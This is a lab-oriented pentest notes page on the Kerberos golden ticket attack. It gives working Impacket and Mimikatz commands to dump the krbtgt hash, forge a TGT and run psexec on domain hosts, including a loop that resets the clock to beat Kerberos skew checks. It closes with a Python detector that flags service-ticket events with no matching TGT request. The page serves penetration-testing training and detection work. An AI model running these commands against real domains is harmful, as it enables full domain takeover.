# Golden Ticket Attack

## Overview

When we compromise the **krbtgt** account (specifically its NTLM hash), we effectively own the domain: we can forge Kerberos TGTs ("golden tickets") for any user we want, which gives us access to every machine in the domain.

We can use [Mimikatz](/active-directory/post-compromise-attacks/mimikatz.md) on the Domain Controller to pull this attack off.

## Golden Ticket Attack via Ticketer

First, get the domain SID (from a shell on the Domain Controller):

```powershell
Get-ADDomain PNPT.local
```


`impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>`

```bash
impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administrator
```


```bash
export KRB5CCNAME=administrator.ccache
```

Add the domain and hostnames to the `/etc/hosts` file so the Kerberos service names resolve:


```bash
impacket-psexec htb.local/administrator@forest -k -no-pass
```

{% hint style="info" %}
You might have to change your system time for Kerberos to accept the ticket: the KDC rejects requests whose clock differs from the DC's by more than the allowed skew (5 minutes by default).
{% endhint %}

<figure><img src="/files/qi96UyfpTUZxeYF7WCvN" alt=""><figcaption><p>From nmap scan</p></figcaption></figure>


```bash
# Step through the hours until the DC stops rejecting the ticket for clock skew
# (`sudo for` is not valid; sudo only needs to wrap the `date` call)
for i in $(seq -w 0 23); do sudo date -s "$i:36:00"; impacket-psexec htb.local/threebigguys@10.10.10.161 -k -no-pass; done
```

```bash
sudo date -s 21:36:00
```

[Resource](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a)

## Golden Ticket Attack via Mimikatz

### In the Domain Controller shell

```
mimikatz.exe
privilege::debug
sekurlsa::lsa /inject /name:krbtgt
```

<figure><img src="/files/sxabvVaxHS85hvfcKjIK" alt=""><figcaption><p>Note down the SID and NTLM hash of krbtgt account</p></figcaption></figure>

```
kerberos::golden /user:Administrator /domain:PNPT.local /sid:S-1-5-21-XXX /krbtgt:11f843XXX /id:500 /ptt
```

```
misc::cmd
psexec \\DESKTOP-ILG11 cmd.exe
```
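Because a forged TGT is never issued by the KDC, the account shows service-ticket requests (Event ID 4769) on the DC without a matching TGT request (Event ID 4768), which is the simplest indicator defenders look for. The following is an added detection example, not part of the original page; the event records are constructed sample data and the 10-hour window is the default TGT lifetime:

```python
# Added example: flag 4769 (TGS request) events with no preceding 4768 (TGT request)
# from the same account and source IP. A golden ticket skips the AS exchange, so the
# KDC has no 4768 for it. Sample events below are constructed, not real logs.
import json
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
{"time": "2024-03-01T08:00:00", "id": 4768, "account": "jdoe", "ip": "10.10.10.50"}
{"time": "2024-03-01T08:00:05", "id": 4769, "account": "jdoe", "ip": "10.10.10.50", "service": "cifs/forest"}
{"time": "2024-03-01T21:36:10", "id": 4769, "account": "administrator", "ip": "10.10.14.7", "service": "cifs/forest"}
"""

# Default maximum TGT lifetime in AD is 10 hours; an older TGT would have been renewed (4768 again)
TGT_WINDOW = timedelta(hours=10)


def parse_events(text):
    """Parse JSON-lines event records and return them sorted by time."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["time"] = datetime.fromisoformat(e["time"])
    return sorted(events, key=lambda e: e["time"])


def find_tgs_without_tgt(events, window=TGT_WINDOW):
    """Return 4769 events whose (account, ip) pair has no 4768 within `window` before them."""
    last_tgt = {}  # (account lowercased, source ip) -> time of most recent 4768
    suspicious = []
    for e in events:
        key = (e["account"].lower(), e["ip"])
        if e["id"] == 4768:
            last_tgt[key] = e["time"]
        elif e["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or e["time"] - seen > window:
                suspicious.append(e)
    return suspicious


if __name__ == "__main__":
    for hit in find_tgs_without_tgt(parse_events(SAMPLE_EVENTS)):
        print(f"{hit['time']} {hit['account']}@{hit['ip']} -> {hit['service']}: TGS without TGT")
```

A host that legitimately caches a TGT across the window (or a DC whose 4768 events went to a different collector) will also trigger this, so it is a triage signal rather than proof.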
